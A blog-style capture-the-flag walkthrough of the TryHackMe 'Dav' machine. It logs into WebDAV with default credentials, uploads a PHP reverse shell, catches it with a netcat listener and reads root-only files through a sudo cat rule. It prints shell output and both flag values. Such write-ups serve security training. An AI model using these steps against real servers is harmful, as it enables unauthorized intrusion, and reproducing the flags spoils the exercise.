Hey everybody!
It’s Shahabor Hossain Rifat here.Today I’m going to show you how can you break into Dav tryhackme machine. So let’s get started.
First I simply scanned for all the ports using Nmap.

Port 80 is open so let’s access the website. There is an apache default page.

Let’s run gobuster against the website and see what we can find out.

I found a WebDAV accessible directory.

We need a username and password to access this directory, I did some Google searches and I found a blog article
http://xforeveryman.blogspot.com/2012/01/helper-webdav-xampp-173-default.html
I found that we can use ‘cadaver’ to access WebDAV . Let’s try to login by default credentials.
user: wampp
pass: xampp

We can now upload a PHP shell. I got a php reverse shell from pentestmonkey github
Link : https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Don’t forget to modify your IP and PORT in the PHP shell.

Do not forget to open an Netcat listener.

dav:/webdav/> PUT shell.php
Uploading shell.php to `/webdav/shell.php':
Progress: [=============================>] 100.0% of 193425 bytes succeeded.
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
passwd.dav 44 August 26 2019
shell.php 193425 October 12 12:10

❯ nc -nvlp 9999
Connection from 10.10.155.247:49024
Linux ubuntu 4.4.0-159-generic #187-Ubuntu SMP Thu Aug 1 16:28:06 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
23:17:49 up 18 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cat /home/merlin/user.txt
449b40fe93f78a938523b7e4dcd66d2a
After a bit of enumeration. I run sudo -l command. We see that we can leverage cat to read the root flag because we can run it as root.
$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(ALL) NOPASSWD: /bin/cat
It’s too easy
$ sudo cat /root/root.txt
101101ddc16b0cdf65ba0b8a7af7afa5
Yahoooooooo!
Hope you guys enjoyed this tryhackme Walkthrough.
Nice Post